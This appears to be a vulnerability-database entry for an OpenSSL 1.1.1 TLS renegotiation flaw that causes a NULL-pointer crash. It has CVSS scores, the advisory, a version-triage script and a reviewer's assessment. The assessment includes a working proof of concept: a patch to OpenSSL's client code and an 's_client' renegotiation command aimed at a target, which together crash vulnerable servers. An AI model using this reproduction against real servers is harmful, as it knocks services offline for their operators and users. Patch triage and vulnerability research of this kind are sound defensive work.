CVSS3: 7.4 High
Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS2: 5.8 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N
An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).
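The exposure conditions in the description above, written as a triage check. This is an added example, not code from OpenSSL or from the original page; the function names and the inventory rows are constructed for illustration, and it assumes the reported version string reflects the real patch level.

```python
import re

# Range as stated in the description: 1.1.1 through 1.1.1j affected, fixed in 1.1.1k.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)([a-z]*)")


def parse_openssl_version(text):
    """Return (major, minor, patch, letter_rank) from e.g. 'OpenSSL 1.1.1j  16 Feb 2021'."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no OpenSSL version found in {text!r}")
    major, minor, patch, letters = m.groups()
    rank = 0  # letter releases order as '' < a < ... < z < za < zb
    for ch in letters:
        rank = rank * 27 + (ord(ch) - ord("a") + 1)
    return int(major), int(minor), int(patch), rank


def in_affected_range(version_text):
    """True for 1.1.1 up to and including 1.1.1j."""
    major, minor, patch, rank = parse_openssl_version(version_text)
    fixed_rank = parse_openssl_version("1.1.1k")[3]
    return (major, minor, patch) == (1, 1, 1) and rank < fixed_rank


def assess(version_text, is_server, tls12_enabled, renegotiation_enabled):
    """Apply the description's conditions; returns (exposed, reason)."""
    if not in_affected_range(version_text):
        return False, "version outside 1.1.1-1.1.1j"
    if not is_server:
        return False, "TLS clients are not impacted"
    if not (tls12_enabled and renegotiation_enabled):
        return False, "needs TLSv1.2 and renegotiation both enabled"
    return True, "upgrade to 1.1.1k"


# Constructed inventory rows: (host, `openssl version` output, server?, TLSv1.2?, renegotiation?)
INVENTORY = [
    ("web-01", "OpenSSL 1.1.1j  16 Feb 2021", True, True, True),
    ("web-02", "OpenSSL 1.1.1k  25 Mar 2021", True, True, True),
    ("legacy", "OpenSSL 1.0.2u  20 Dec 2019", True, True, True),
    ("batch-client", "OpenSSL 1.1.1g  21 Apr 2020", False, True, True),
]

if __name__ == "__main__":
    for host, ver, srv, tls12, reneg in INVENTORY:
        print(host, *assess(ver, srv, tls12, reneg))
```

Vendor packages that backport the fix can keep an older version string, so treat a positive result from the string alone as something to confirm against the vendor advisory.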
Recent assessments:
zeroSteiner at March 26, 2021 2:54pm UTC reported:
The exploitation of this vulnerability would be most easily accomplished using a patched version of OpenSSL to modify the extensions sent within the ClientHello of the renegotiation. Successful exploitation of this vulnerability is likely limited to a Denial of Service condition. Allocating and setting the contents of the NULL page is extremely unlikely from the vantage point of a remote attacker.
The following patch can be applied to OpenSSL 1.1.1k (commit fd78df59) to generate a build capable of reproducing the vulnerability.
index ce8a75794c..3e3f774dab 100644
--- a/ssl/statem/extensions_clnt.c
+++ b/ssl/statem/extensions_clnt.c
@@ -272,7 +272,7 @@ EXT_RETURN tls_construct_ctos_sig_algs(SSL *s, WPACKET *pkt,
return EXT_RETURN_NOT_SENT;
salglen = tls12_get_psigalgs(s, 1, &salg);
- if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms)
+ if (!WPACKET_put_bytes_u16(pkt, (s->renegotiate ? TLSEXT_TYPE_signature_algorithms_cert : TLSEXT_TYPE_signature_algorithms))
/* Sub-packet for sig-algs extension */
|| !WPACKET_start_sub_packet_u16(pkt)
/* Sub-packet for the actual list */
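Review bot: the ternary added to the `WPACKET_put_bytes_u16` call keys only on `s->renegotiate`, so every renegotiation performed by a client built from this tree writes the list under `TLSEXT_TYPE_signature_algorithms_cert` instead of `TLSEXT_TYPE_signature_algorithms`, and nothing in the hunk marks that as test-only. Put the substitution behind a compile-time guard that is off by default and add a comment stating it exists to reproduce the server-side crash, so the change cannot end up in a normal build. The new line also runs well past 80 columns and should be wrapped like the `||` continuation lines below it.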
What this change is doing is swapping the signature_algorithms extension for signature_algorithms_cert when the SSL context is renegotiating.
With a patched version of OpenSSL built, run the openssl client, specifying TLS version 1.2 and renegotiate.
echo R | apps/openssl s_client -connect target:443 -msg -tls1_2
Assessed Attacker Value: 3
Assessed Attacker Value: 4